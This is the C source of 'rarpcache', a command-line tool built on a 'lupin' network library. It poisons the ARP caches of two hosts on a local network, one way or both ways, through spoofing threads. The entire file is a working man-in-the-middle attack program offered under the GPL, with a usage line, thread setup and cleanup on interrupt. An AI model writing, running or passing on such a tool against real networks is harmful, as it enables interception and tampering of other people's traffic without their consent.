/* -*- Mode:C; c-file-style:"gnu"; indent-tabs-mode:nil; -*- */
/*
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 3 as
 * published by the Free Software Foundation;
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 * Author: Marco Guastella <vasta@ragnu.it>
 */
 
#include <lupin/lupin.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <signal.h>

l_str localmac;
l_int32 mod;
void *aspoof1;
void *aspoof2;
void *adirect1;
void *adirect2;
pthread_t t1,t2,t3,t4;

void usage()
{
	l_std_err("rarpcache [-h maclocal] [-a] device ip_host1 ip_host2\n");	
}

void end(l_int32 i)
{
	l_int32 ret;
	l_out out1,out2,out3,out4;
	switch(mod)
	{
		case 0:
				out1=l_arp_spoof_close(&aspoof1);
				out2=l_arp_spoof_close(&aspoof2);
				out3=l_arp_direct_close(&adirect1);
				out4=l_arp_direct_close(&adirect2);
				if(l_out_iserr(out1))
				{
					l_out_print(out1);
					ret=EXIT_FAILURE;
				}
				else if(l_out_iserr(out2))
				{
					l_out_print(out2);
					ret=EXIT_FAILURE;
				}
				else if(l_out_iserr(out3))
				{
					l_out_print(out3);
					ret=EXIT_FAILURE;
				}
				else if(l_out_iserr(out4))
				{
					l_out_print(out4);
					ret=EXIT_FAILURE;
				}
				else
				{	
					l_std_out("arpcache routine finish\n");
					ret=EXIT_SUCCESS;
				}
				l_out_free(&out1);
				l_out_free(&out2);
				l_out_free(&out3);
				l_out_free(&out4);
				break;
		case 1:
				out1=l_arp_spoof_close(&aspoof1);
				out3=l_arp_direct_close(&adirect1);
				if(l_out_iserr(out1))
				{
					l_out_print(out1);
					ret=EXIT_FAILURE;
				} 
				else if(l_out_iserr(out3))
				{
					l_out_print(out3);
					ret=EXIT_FAILURE;
				}
				else
				{	
					l_std_out("arpcache routine finish\n");
					ret=EXIT_SUCCESS;
				}
				l_out_free(&out1);
				l_out_free(&out3);
				break;
				
	}		
	l_str_free(&localmac);
	exit(ret);
}

 l_int32 main(l_int32 argc,l_char **argv)
 {
	l_bool err=FALSE;
	l_int32 c;
	l_int32 arg=1,arg1,arg2;
	localmac=l_str_new();
	mod=0;
	while ((c = getopt (argc, argv, "h:a")) != -1)
	{
		if(c=='h' && localmac==0)
		{
			l_str_write(&localmac,"%s",optarg);	
			arg+=2;
		}
		else if(c=='a' && mod==0)
		{
			mod=1;
			arg+=1;
		}		
		else 
		{	
			err=TRUE;
			break;
		}
	}
	if(!err && (argc-arg) == 3)
	{
		arg1=arg+1;
		arg2=arg+2;
		signal(SIGINT,end);
		switch(mod)
		{
			case 0:  	aspoof1=l_arp_spoof_init(argv[arg],argv[arg1],argv[arg2],localmac);
					aspoof2=l_arp_spoof_init(argv[arg],argv[arg2],argv[arg1],localmac);
					adirect1=l_arp_direct_init(argv[arg],argv[arg1],argv[arg2],localmac,0);
					adirect2=l_arp_direct_init(argv[arg],argv[arg2],argv[arg1],localmac,0);
					if(l_arp_spoof_err(aspoof1) || l_arp_spoof_err(aspoof2) || l_arp_direct_err(adirect1) || l_arp_direct_err(adirect2))
						end(0);
					pthread_create(&t1,0,l_arp_spoof_exec,aspoof1);
					pthread_create(&t2,0,l_arp_spoof_exec,aspoof2);
					pthread_create(&t3,0,l_arp_direct_exec,adirect1);
					pthread_create(&t4,0,l_arp_direct_exec,adirect2);
					pthread_join(t1,0);
					pthread_join(t2,0);
					pthread_join(t3,0);
					pthread_join(t4,0);
					end(0);
			
			case 1:	aspoof1=l_arp_spoof_init(argv[arg],argv[arg1],argv[arg2],localmac);
					adirect1=l_arp_direct_init(argv[arg],argv[arg1],argv[arg2],localmac,0);
					if(l_arp_spoof_err(aspoof1) || l_arp_direct_err(adirect1))
						end(0);
					pthread_create(&t1,0,l_arp_spoof_exec,aspoof1);	
					pthread_create(&t3,0,l_arp_direct_exec,adirect1);
					pthread_join(t1,0);
					pthread_join(t3,0);
					end(0);
		}
	}	
	else
		err=TRUE;
	if(err)
	{	
		usage();
		l_str_free(&localmac);
		exit(EXIT_FAILURE);
	}
	l_str_free(&localmac);
	exit(EXIT_SUCCESS);	
 }
 